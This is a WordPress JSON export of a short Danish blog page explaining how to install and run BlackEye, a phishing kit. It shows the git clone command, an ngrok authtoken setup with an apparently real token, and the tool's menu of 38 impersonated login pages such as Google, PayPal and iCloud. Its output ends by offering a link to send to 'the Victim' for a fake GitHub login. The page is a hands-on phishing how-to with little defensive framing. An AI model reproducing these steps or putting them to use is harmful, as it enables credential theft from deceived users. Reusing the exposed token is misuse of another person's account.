{"id":20793,"date":"2021-01-26T23:32:59","date_gmt":"2021-01-26T22:32:59","guid":{"rendered":"https:\/\/www.linuxboxen.dk\/?page_id=20793"},"modified":"2021-01-26T23:32:59","modified_gmt":"2021-01-26T22:32:59","slug":"blackeye-hvad-er-det","status":"publish","type":"page","link":"https:\/\/www.linuxboxen.dk\/?page_id=20793","title":{"rendered":"blackeye hvad er det ?"},"content":{"rendered":"<p><img decoding=\"async\" width=\"640\" height=\"388\" src=\"https:\/\/www.linuxboxen.dk\/wp-content\/uploads\/2021\/01\/blackeye_Screen-Shot-1024x621.png\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.linuxboxen.dk\/wp-content\/uploads\/2021\/01\/blackeye_Screen-Shot-1024x621.png 1024w, https:\/\/www.linuxboxen.dk\/wp-content\/uploads\/2021\/01\/blackeye_Screen-Shot-300x182.png 300w, https:\/\/www.linuxboxen.dk\/wp-content\/uploads\/2021\/01\/blackeye_Screen-Shot-768x466.png 768w, https:\/\/www.linuxboxen.dk\/wp-content\/uploads\/2021\/01\/blackeye_Screen-Shot-1536x932.png 1536w, https:\/\/www.linuxboxen.dk\/wp-content\/uploads\/2021\/01\/blackeye_Screen-Shot-360x218.png 360w, https:\/\/www.linuxboxen.dk\/wp-content\/uploads\/2021\/01\/blackeye_Screen-Shot.png 1566w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/>\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<p>blackeye hvad er det ?.<\/p>\n<p>Det er et tool til at Phishing attacks som er meget nemt at bruge.<\/p>\n<p>For at installere den skal du bruge git.<\/p>\n<pre>$ git clone https:\/\/github.com\/An0nUD4Y\/blackeye.git\n<\/pre>\n<p>Derefter skal du bruge en konti p\u00e5 ngrok.com hvor du skal bruge en token som skal installeres p\u00e5 denne m\u00e5de.<\/p>\n<pre>\n$ .\/ngrok authtoken 6fTbS8gkYT3vD40qWfg5E7jtpxxAp2SHfGwDaZlDBWJAJSPvE\nAuthtoken saved to configuration file: \/home\/hans\/.ngrok2\/ngrok.yml\n<\/pre>\n<p>N\u00e5r du har installeret programmet starter du med blackeye.sh<\/p>\n<pre>\n$ cd blackeye\n$ bash .\/blackeye.sh\n:: Disclaimer: Developers assume no liability and are not ::\n:: responsible for any misuse or damage caused by BlackEye. ::\n:: Only use for educational purporses!! ::\n:: BLACKEYE v1.5! By @suljot_gjoka &amp; @thelinuxchoice ::\n[01] Instagram [17] DropBox [33] eBay \n[02] Facebook [18] Adobe ID [34] Amazon \n[03] Snapchat [19] Shopify [35] iCloud \n[04] Twitter [20] Messenger [36] Spotify \n[05] Github [21] GitLab [37] Netflix \n[06] Google [22] Twitch [38] Custom \n[07] Origin [23] MySpace \n[08] Yahoo [24] Badoo \n[09] Linkedin [25] VK \n[10] Protonmail [26] Yandex \n[11] WordPress [27] devianART \n[12] Microsoft [28] Wi-Fi \n[13] IGFollowers [29] PayPal \n[14] Pinterest [30] Steam \n[15] Apple ID [31] Bitcoin \n[16] Verizon [32] Playstation\n[*] Choose an option: 5\n[*] Starting php server...\n[*] Starting ngrok server...\n[*] Send this link to the Victim: http:\/\/50d2aa60fc8a.ngrok.io\n[*] Waiting victim open the link ...\n<\/pre>\n<p>Her har jeg valgt Github som platform. Du kan nu bruge den link for at vise en side.<br \/>\nBrugere vil f\u00e5 en github falsk side at login p\u00e5.<br \/>\nDette tool er et rigtigt grimt v\u00e6rkt\u00f8j.<\/p>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=u9dBGWVwMMA\">Video\u00a0<\/a><\/p>\n<div class=\"pvc_clear\"><\/div>\n<p id=\"pvc_stats_20793\" class=\"pvc_stats all  \" data-element-id=\"20793\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> <img loading=\"lazy\" decoding=\"async\" width=\"16\" height=\"16\" alt=\"Loading\" src=\"https:\/\/www.linuxboxen.dk\/wp-content\/plugins\/page-views-count\/ajax-loader-2x.gif\" border=0 \/><\/p>\n<div class=\"pvc_clear\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p>blackeye hvad er det ?. Det er et tool til at Phishing attacks som er meget nemt at bruge. For at installere den skal du bruge git. $ git clone https:\/\/github.com\/An0nUD4Y\/blackeye.git Derefter skal du bruge en konti p\u00e5 ngrok.com hvor du skal bruge en token som skal installeres p\u00e5 denne m\u00e5de. $ .\/ngrok authtoken 6fTbS8gkYT3vD40qWfg5E7jtpxxAp2SHfGwDaZlDBWJAJSPvE [&hellip;]<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p id=\"pvc_stats_20793\" class=\"pvc_stats all  \" data-element-id=\"20793\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> <img loading=\"lazy\" decoding=\"async\" width=\"16\" height=\"16\" alt=\"Loading\" src=\"https:\/\/www.linuxboxen.dk\/wp-content\/plugins\/page-views-count\/ajax-loader-2x.gif\" border=0 \/><\/p>\n<div class=\"pvc_clear\"><\/div>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"class_list":["post-20793","page","type-page","status-publish","hentry"],"a3_pvc":{"activated":true,"total_views":63,"today_views":0},"_links":{"self":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/pages\/20793","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20793"}],"version-history":[{"count":0,"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/pages\/20793\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20793"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}